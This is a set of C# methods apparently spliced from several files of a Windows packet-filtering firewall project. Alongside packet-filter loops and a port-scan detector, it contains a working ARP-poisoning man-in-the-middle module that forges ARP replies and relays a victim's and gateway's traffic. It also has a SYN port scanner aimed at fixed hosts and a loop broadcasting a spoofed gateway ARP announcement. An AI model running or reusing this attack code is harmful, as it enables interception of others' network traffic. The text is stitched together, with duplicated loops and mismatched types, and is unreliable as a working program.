/// <summary>
/// Generate and return an ARP packet
/// </summary>
/// <param name="from">The FROM address to be used in the ARP layer (user)</param>
/// <param name="to">The TO address (gateway)</param>
/// <param name="mFrom">The MAC address of the user (or attacker)</param>
/// <param name="mTo">The MAC address of the gateway</param>
/// <returns></returns>
private ARPPacket generateARP(IPAddress from, IPAddress to, PhysicalAddress mFrom, PhysicalAddress mTo)
{
// build the ethernet layer packet
EthPacket eth = new EthPacket(42);
eth.FromMac = mFrom.GetAddressBytes();
eth.ToMac = mTo.GetAddressBytes();
eth.Proto = new byte[2] {
0x08, 0x06
};
// build the arp
ARPPacket arp = new ARPPacket(eth);
arp.HardwareSize = 6;
arp.HardwareType = 1;
arp.ProtocolType = 0x0800;
arp.ProtocolSize = 4;
arp.ASenderIP = from;
arp.ATargetIP = to;
arp.ASenderMac = mFrom.GetAddressBytes();
arp.ATargetMac = mTo.GetAddressBytes();
arp.Outbound = true;
arp.ProtocolSize = 0x04;
// mark it REPLY
arp.ARPOpcode = 2;
return(arp);
}
public PacketStatus GetStatus(Packet pkt)
{
EthPacket epkt = (EthPacket)pkt;
if (pkt.Outbound && (direction & Direction.OUT) == Direction.OUT)
{
if (mac == null || Utility.ByteArrayEq(mac, epkt.ToMac))
{
if (log)
{
message = "packet from " + new PhysicalAddress(epkt.FromMac).ToString() +
" to " + new PhysicalAddress(epkt.ToMac).ToString();
}
return(ps);
}
}
else if (!pkt.Outbound && (direction & Direction.IN) == Direction.IN)
{
if (mac == null || Utility.ByteArrayEq(mac, epkt.FromMac))
{
if (log)
{
message = "packet from " + new PhysicalAddress(epkt.FromMac).ToString() +
" to " + new PhysicalAddress(epkt.ToMac).ToString();
}
return(ps);
}
}
return(PacketStatus.UNDETERMINED);
}
void ScanThread()
{
for (int x = 0; x < ushort.MaxValue; x++)
{
EthPacket e = new EthPacket(60);
e.FromMac = adapter.InterfaceInformation.GetPhysicalAddress().GetAddressBytes();
e.ToMac = PhysicalAddress.Parse("080027465EDE").GetAddressBytes();
e.Proto = new byte[2] {
0x08, 0x00
};
IPPacket ip = new IPPacket(e);
ip.DestIP = IPAddress.Parse("192.168.1.4");
ip.SourceIP = IPAddress.Parse("192.168.1.3");
ip.NextProtocol = 0x06;
ip.TotalLength = 40;
ip.HeaderChecksum = ip.GenerateIPChecksum;
TCPPacket tcp = new TCPPacket(ip);
tcp.SourcePort = (ushort)new Random().Next(65534);
tcp.DestPort = (ushort)x;
tcp.SequenceNumber = (uint)new Random().Next();
tcp.AckNumber = 0;
tcp.WindowSize = 8192;
tcp.SYN = true;
tcp.Checksum = tcp.GenerateChecksum;
tcp.Outbound = true;
adapter.SendPacket(tcp);
Thread.Sleep(1);
}
}
public void threadMain()
{
while (true)
{
if (Enabled)
{
EthPacket ep = new EthPacket(42);
ep.FromMac = PhysicalAddress.Parse("F07BCB8F7AC5").GetAddressBytes();
ep.ToMac = PhysicalAddress.Parse("FFFFFFFFFFFF").GetAddressBytes();
ep.Proto = new byte[2] {
0x08, 0x06
};
ARPPacket arpp = new ARPPacket(ep);
arpp.ASenderMac = ep.FromMac;
arpp.ASenderIP = IPAddress.Parse("192.168.0.1");
arpp.ATargetMac = ep.ToMac;
arpp.ATargetIP = IPAddress.Parse("192.168.0.255");
adapter.SendPacket(arpp);
}
Thread.Sleep(1000);
}
}
public unsafe override PacketMainReturn interiorMain(ref Packet in_packet)
{
lock (padlock)
{
if (theirMac == null)
{
return(null);
}
EthPacket e = (EthPacket)in_packet;
if ((e.Proto[0] & 0x01) == 0x01 && (CompareMac(theirMac, e.FromMac) && CompareMac(myMac, e.ToMac) || (CompareMac(theirMac, e.ToMac) && CompareMac(myMac, e.FromMac))))
{
INTERMEDIATE_BUFFER *IB = e.IB;
rc4.SetKeyState(key);
INTERMEDIATE_BUFFER *iba = (INTERMEDIATE_BUFFER *)Marshal.AllocHGlobal(Marshal.SizeOf(new INTERMEDIATE_BUFFER()));
iba->m_dwDeviceFlags = IB->m_dwDeviceFlags;
iba->m_Flags = IB->m_Flags;
iba->m_Length = IB->m_Length;
iba->m_qLink = IB->m_qLink;
for (int x = 12; x < IB->m_Length; x++)
{
iba->m_IBuffer[x] = (byte)(IB->m_IBuffer[x] ^ rc4.Next());
}
EthPacket nPacket = new EthPacket(iba);
nPacket.FromMac = e.FromMac;
nPacket.ToMac = e.ToMac;
nPacket.Proto = new byte[2];
nPacket.Proto[0] = (byte)(0xFE & e.Proto[0]);
nPacket.Proto[1] = e.Proto[1];
adapter.ProcessPacket(nPacket);
return(new PacketMainReturn("SimpleMacEncryption")
{
returnType = PacketMainReturnType.Drop
});
}
}
return(null);
}
unsafe void ProcessLoop()
{
// Allocate and initialize packet structures
ETH_REQUEST Request = new ETH_REQUEST();
INTERMEDIATE_BUFFER PacketBuffer = new INTERMEDIATE_BUFFER();
IntPtr PacketBufferIntPtr = Marshal.AllocHGlobal(Marshal.SizeOf(PacketBuffer));
try
{
win32api.ZeroMemory(PacketBufferIntPtr, Marshal.SizeOf(PacketBuffer));
Request.hAdapterHandle = adapterHandle;
Request.EthPacket.Buffer = PacketBufferIntPtr;
modules = new ModuleList(this);
modules.LoadExternalModules();
modules.UpdateModuleOrder();
string folder = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
folder = folder + System.IO.Path.DirectorySeparatorChar + "firebwall";
if (!System.IO.Directory.Exists(folder))
{
System.IO.Directory.CreateDirectory(folder);
}
folder = folder + System.IO.Path.DirectorySeparatorChar + "pcapLogs";
if (!System.IO.Directory.Exists(folder))
{
System.IO.Directory.CreateDirectory(folder);
}
string f = folder + System.IO.Path.DirectorySeparatorChar + "blocked-" + this.InterfaceInformation.Name + "-" + PcapCreator.Instance.GetNewDate() + ".pcap";
pcaplog = new PcapFileWriter(f);
INTERMEDIATE_BUFFER *PacketPointer;
while (true)
{
hEvent.WaitOne();
while (Ndisapi.ReadPacket(hNdisapi, ref Request))
{
PacketPointer = (INTERMEDIATE_BUFFER *)PacketBufferIntPtr;
//PacketBuffer = (INTERMEDIATE_BUFFER)Marshal.PtrToStructure(PacketBufferIntPtr, typeof(INTERMEDIATE_BUFFER));
Packet pkt = new EthPacket(PacketPointer).MakeNextLayerPacket();
if (pkt.Outbound)
{
OutBandwidth.AddBits(pkt.Length());
}
else
{
InBandwidth.AddBits(pkt.Length());
}
bool drop = false;
bool edit = false;
if (enabled)
{
for (int x = 0; x < modules.Count; x++)
{
FirewallModule fm = modules.GetModule(x);
PacketMainReturn pmr = fm.PacketMain(ref pkt);
if (pmr == null)
{
continue;
}
if ((pmr.returnType & PacketMainReturnType.Log) == PacketMainReturnType.Log && pmr.logMessage != null)
{
LogCenter.Instance.Push(pmr);
}
if ((pmr.returnType & PacketMainReturnType.Drop) == PacketMainReturnType.Drop)
{
drop = true;
break;
}
if ((pmr.returnType & PacketMainReturnType.Edited) == PacketMainReturnType.Edited)
{
edit = true;
}
}
}
if (!drop)
{
if (pkt.Outbound)
{
Ndisapi.SendPacketToAdapter(hNdisapi, ref Request);
}
else
{
Ndisapi.SendPacketToMstcp(hNdisapi, ref Request);
}
}
else
{
pcaplog.AddPacket(pkt.Data(), (int)pkt.Length());
}
}
//OM NOM NOM PASTA!
while (processQueue.Count != 0)
{
Packet pkt = processQueue.Dequeue().MakeNextLayerPacket();
if (pkt.Outbound)
{
OutBandwidth.AddBits(pkt.Length());
}
else
{
InBandwidth.AddBits(pkt.Length());
}
bool drop = false;
bool edit = false;
if (enabled)
{
for (int x = 0; x < modules.Count; x++)
{
FirewallModule fm = modules.GetModule(x);
PacketMainReturn pmr = fm.PacketMain(ref pkt);
if (pmr == null)
{
continue;
}
if ((pmr.returnType & PacketMainReturnType.Log) == PacketMainReturnType.Log && pmr.logMessage != null)
{
LogCenter.Instance.Push(pmr.Module, pmr.logMessage);
}
if ((pmr.returnType & PacketMainReturnType.Drop) == PacketMainReturnType.Drop)
{
drop = true;
break;
}
if ((pmr.returnType & PacketMainReturnType.Edited) == PacketMainReturnType.Edited)
{
edit = true;
}
}
}
if (!drop)
{
if (pkt.Outbound)
{
Ndisapi.SendPacketToAdapter(hNdisapi, ref Request);
}
else
{
Ndisapi.SendPacketToMstcp(hNdisapi, ref Request);
}
}
else
{
pcaplog.AddPacket(pkt.Data(), (int)pkt.Length());
}
}
hEvent.Reset();
}
}
catch (Exception tae)
{
Marshal.FreeHGlobal(PacketBufferIntPtr);
}
}
/// <summary>
/// handle incoming packets
/// </summary>
/// <param name="in_packet"></param>
/// <returns></returns>
public override PacketMainReturn handlePacket(Packet in_packet)
{
PacketMainReturn pmr;
if (isPoisoning)
{
if (in_packet.ContainsLayer(Protocol.Ethernet) && !(in_packet.Outbound))
{
EthPacket packet = (EthPacket)in_packet;
if (in_packet.ContainsLayer(Protocol.IP))
{
IPPacket ip = (IPPacket)in_packet;
if (ip.DestIP.Equals(GetLocalIP()))
{
return(null);
}
}
// check if the packet is from our USER; if it is, rewrite the destination MAC to the
// router MAC address
if (new PhysicalAddress(packet.FromMac).ToString().Equals(from_mac.ToString()))
{
packet.ToMac = to_mac.GetAddressBytes();
packet.FromMac = local_mac.GetAddressBytes();
packet.Outbound = true;
// send the packet and drop the pmr so the packet isn't processed any further
adapter.SendPacket(packet);
pmr = new PacketMainReturn("PoisonIvy");
pmr.returnType = PacketMainReturnType.Drop;
return(pmr);
}
// check for the TO MAC address; if it's from our gateway, then it needs to be forwarded
// to our poisoned user
if (new PhysicalAddress(packet.FromMac).ToString().Equals(to_mac.ToString()))
{
// swap out the MAC and forward it
packet.ToMac = from_mac.GetAddressBytes();
packet.FromMac = local_mac.GetAddressBytes();
packet.Outbound = true;
// send the packet and drop the pmr so the packet isn't processed any further
adapter.SendPacket(packet);
pmr = new PacketMainReturn("PoisonIvy");
pmr.returnType = PacketMainReturnType.Drop;
return(pmr);
}
}
// repoison if we catch the FROM or TO address making ARP requests to the opposite party
if (in_packet.ContainsLayer(Protocol.ARP) && !(in_packet.Outbound))
{
ARPPacket request = (ARPPacket)in_packet;
// if it's from our FROM ip
if (request.ASenderIP.Equals(from))
{
// if they're requesting the TO ip address, respond. This is a race condition!
if (request.ATargetIP.Equals(to))
{
System.Diagnostics.Debug.WriteLine("repoisoning USER ip " + request.ASenderIP.ToString());
for (int i = 0; i < 10; ++i)
{
adapter.SendPacket(generateARP(to, request.ASenderIP,
local_mac,
new PhysicalAddress(request.ASenderMac)));
System.Threading.Thread.Sleep(500);
}
}
}
// if it's from our TO ip
if (request.ASenderIP.Equals(to))
{
if (request.ATargetIP.Equals(from))
{
System.Diagnostics.Debug.WriteLine("repoisoning GATEWAY ip " + request.ASenderIP.ToString());
for (int i = 0; i < 10; ++i)
{
adapter.SendPacket(generateARP(from, to, local_mac,
to_mac));
System.Threading.Thread.Sleep(500);
}
}
}
}
}
/// if we're waiting for a packet to come through with the FROM address IP, check if this packet is it, and if it is,
/// grab the MAC and save it
if (isWaitingFROM)
{
if (in_packet.ContainsLayer(Protocol.IP) && !(in_packet.Outbound))
{
IPPacket packet = (IPPacket)in_packet;
if (packet.SourceIP.Equals(from))
{
from_mac = new PhysicalAddress(packet.FromMac);
System.Diagnostics.Debug.WriteLine("Caught FROM MAC at: " + from_mac.ToString());
isWaitingFROM = false;
}
}
}
// likewise above with TO address
if (isWaitingTO)
{
if (in_packet.ContainsLayer(Protocol.IP) && !(in_packet.Outbound))
{
IPPacket packet = (IPPacket)in_packet;
if (packet.SourceIP.Equals(to))
{
to_mac = new PhysicalAddress(packet.FromMac);
System.Diagnostics.Debug.WriteLine("Caught TO MAC at: " + to_mac.ToString());
isWaitingTO = false;
}
}
}
return(null);
}
public override PacketMainReturn interiorMain(ref Packet in_packet)
{
PacketMainReturn pmr;
float av = 0;
if (in_packet.ContainsLayer(Protocol.TCP))
{
// if we're in cloaked mode, respond with the SYN ACK
// More information about this in the GUI code and help string
if (data.cloaked_mode && ((TCPPacket)in_packet).SYN)
{
TCPPacket from = (TCPPacket)in_packet;
EthPacket eth = new EthPacket(60);
eth.FromMac = adapter.InterfaceInformation.GetPhysicalAddress().GetAddressBytes();
eth.ToMac = from.FromMac;
eth.Proto = new byte[2] {
0x08, 0x00
};
IPPacket ip = new IPPacket(eth);
ip.DestIP = from.SourceIP;
ip.SourceIP = from.DestIP;
ip.NextProtocol = 0x06;
ip.TotalLength = 40;
ip.HeaderChecksum = ip.GenerateIPChecksum;
TCPPacket tcp = new TCPPacket(ip);
tcp.SourcePort = from.DestPort;
tcp.DestPort = from.SourcePort;
tcp.SequenceNumber = (uint)new Random().Next();
tcp.AckNumber = 0;
tcp.WindowSize = 8192;
tcp.SYN = true;
tcp.ACK = true;
tcp.Checksum = tcp.GenerateChecksum;
tcp.Outbound = true;
adapter.SendPacket(tcp);
}
try
{
TCPPacket packet = (TCPPacket)in_packet;
// if the IP is in the blockcache, then return
if (data.BlockCache.ContainsKey(packet.SourceIP))
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Drop;
return(pmr);
}
// checking for TTL allows us to rule out the local network
// Don't check for TCP flags because we can make an educated guess that if 100+ of our ports are
// fingered with a short window, we're being scanned. this will detect syn, ack, null, xmas, etc. scans.
if ((!packet.Outbound) && (packet.TTL < 250))
{
IPObj tmp;
if (ip_table.ContainsKey(packet.SourceIP))
{
tmp = (IPObj)ip_table[packet.SourceIP];
}
else
{
tmp = new IPObj(packet.SourceIP);
}
// add the port to the ipobj, set the access time, and update the table
tmp.addPort(packet.DestPort);
tmp.time(packet.PacketTime);
ip_table[packet.SourceIP] = tmp;
av = tmp.getAverage();
// if they've touched more than 100 ports in less than 30 seconds and the average
// packet time was less than 2s, something's wrong
if (tmp.getTouchedPorts().Count >= 100 && (!tmp.Reported) &&
tmp.getAverage() < 2000)
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Log | PacketMainReturnType.Allow;
pmr.logMessage = string.Format("{0} touched {1} ports with an average of {2}\n", packet.SourceIP,
tmp.getTouchedPorts().Count, tmp.getAverage());
// set the reported status of the IP address
ip_table[packet.SourceIP].Reported = true;
// add the address to the potential list of IPs and to the local SESSION-BASED list
if (!data.blockImmediately)
{
potentials.Add(packet.SourceIP, ip_table[packet.SourceIP]);
detect.addPotential(packet.SourceIP);
}
// else we want to block it immediately
else
{
data.BlockCache.Add(packet.SourceIP, ip_table[packet.SourceIP]);
}
return(pmr);
}
}
}
catch (Exception e)
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Log;
pmr.logMessage = String.Format("{0}\n{1}\n", e.Message, e.StackTrace);
return(pmr);
}
}
// This will detect UDP knockers. typically UDP scans are slower, but are combined with SYN scans
// (-sSU in nmap) so we'll be sure to check for these guys too.
else if (in_packet.ContainsLayer(Protocol.UDP))
{
try
{
UDPPacket packet = (UDPPacket)in_packet;
// if the source addr is in the block cache, return
if (data.BlockCache.ContainsKey(packet.SourceIP))
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Drop;
return(pmr);
}
if ((!packet.Outbound) && (packet.TTL < 250) &&
(!packet.isDNS()))
{
IPObj tmp;
if (ip_table.ContainsKey(packet.SourceIP))
{
tmp = (IPObj)ip_table[packet.SourceIP];
}
else
{
tmp = new IPObj(packet.SourceIP);
}
tmp.addPort(packet.DestPort);
tmp.time(packet.PacketTime);
ip_table[packet.SourceIP] = tmp;
av = tmp.getAverage();
if ((tmp.getTouchedPorts().Count >= 100) && (!tmp.Reported) &&
(tmp.getAverage() < 2000))
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Log | PacketMainReturnType.Allow;
pmr.logMessage = string.Format("{0} touched {1} ports with an average of {2}\n", packet.SourceIP,
tmp.getTouchedPorts().Count, tmp.getAverage());
ip_table[packet.SourceIP].Reported = true;
if (!data.blockImmediately)
{
potentials.Add(packet.SourceIP, ip_table[packet.SourceIP]);
detect.addPotential(packet.SourceIP);
}
else
{
data.BlockCache.Add(packet.SourceIP, ip_table[packet.SourceIP]);
}
return(pmr);
}
}
}
catch (Exception e)
{
pmr = new PacketMainReturn(this);
pmr.returnType = PacketMainReturnType.Log;
pmr.logMessage = String.Format("{0}\n{1}\n", e.Message, e.StackTrace);
return(pmr);
}
}
return(null);
}
public unsafe void ProcessLoop()
{
// Allocate and initialize packet structures
ETH_REQUEST Request = new ETH_REQUEST();
INTERMEDIATE_BUFFER PacketBuffer = new INTERMEDIATE_BUFFER();
IntPtr PacketBufferIntPtr = Marshal.AllocHGlobal(Marshal.SizeOf(PacketBuffer));
try
{
win32api.ZeroMemory(PacketBufferIntPtr, Marshal.SizeOf(PacketBuffer));
Request.hAdapterHandle = adapterHandle;
Request.EthPacket.Buffer = PacketBufferIntPtr;
Modules = new ModuleList(this);
Modules.LoadExternalModules();
Modules.UpdateModuleOrder();
string folder = Configuration.ConfigurationManagement.Instance.ConfigurationPath;
folder = folder + System.IO.Path.DirectorySeparatorChar + "pcapLogs";
if (!System.IO.Directory.Exists(folder))
{
System.IO.Directory.CreateDirectory(folder);
}
string f = folder + System.IO.Path.DirectorySeparatorChar + "blocked-" + inter.Name + "-" + DateTime.Now.ToBinary() + ".pcap";
pcaplog = new PcapFileWriter(f);
INTERMEDIATE_BUFFER *PacketPointer;
while (true)
{
hEvent.WaitOne();
while (Ndisapi.ReadPacket(hNdisapi, ref Request))
{
PacketPointer = (INTERMEDIATE_BUFFER *)PacketBufferIntPtr;
Packet pkt = new EthPacket(PacketPointer).MakeNextLayerPacket();
if (pkt.Outbound)
{
inter.DataOut.AddBits(pkt.Length());
}
else
{
inter.DataIn.AddBits(pkt.Length());
}
bool drop = false;
bool log = false;
if (this.Filtering)
{
for (int x = 0; x < Modules.Count; x++)
{
NDISModule fm = Modules.GetModule(x);
int pmr = fm.PacketMain(ref pkt);
if (pmr == null)
{
continue;
}
if ((pmr & (int)PacketMainReturnType.LogPacket) == (int)PacketMainReturnType.LogPacket)
{
log = true;
}
if ((pmr & (int)PacketMainReturnType.Drop) == (int)PacketMainReturnType.Drop)
{
drop = true;
break;
}
}
}
if (!drop && !DropAll)
{
if (pkt.Outbound)
{
Ndisapi.SendPacketToAdapter(hNdisapi, ref Request);
}
else
{
Ndisapi.SendPacketToMstcp(hNdisapi, ref Request);
}
}
if (log)
{
pcaplog.AddPacket(pkt.Data(), (int)pkt.Length());
}
}
//OM NOM NOM PASTA!
while (processQueue.Count != 0)
{
Packet pkt = processQueue.Dequeue().MakeNextLayerPacket();
if (pkt.Outbound)
{
inter.DataOut.AddBits(pkt.Length());
}
else
{
inter.DataIn.AddBits(pkt.Length());
}
bool drop = false;
bool log = false;
if (this.Filtering)
{
for (int x = 0; x < Modules.Count; x++)
{
NDISModule fm = Modules.GetModule(x);
int pmr = fm.PacketMain(ref pkt);
if (pmr == 0)
{
continue;
}
if ((pmr & (int)PacketMainReturnType.LogPacket) == (int)PacketMainReturnType.LogPacket)
{
log = true;
}
if ((pmr & (int)PacketMainReturnType.Drop) == (int)PacketMainReturnType.Drop)
{
drop = true;
break;
}
}
}
if (!drop && !DropAll)
{
if (pkt.Outbound)
{
Ndisapi.SendPacketToAdapter(hNdisapi, ref Request);
}
else
{
Ndisapi.SendPacketToMstcp(hNdisapi, ref Request);
}
}
if (log)
{
pcaplog.AddPacket(pkt.Data(), (int)pkt.Length());
}
}
hEvent.Reset();
}
}
catch (Exception tae)
{
Marshal.FreeHGlobal(PacketBufferIntPtr);
}
}
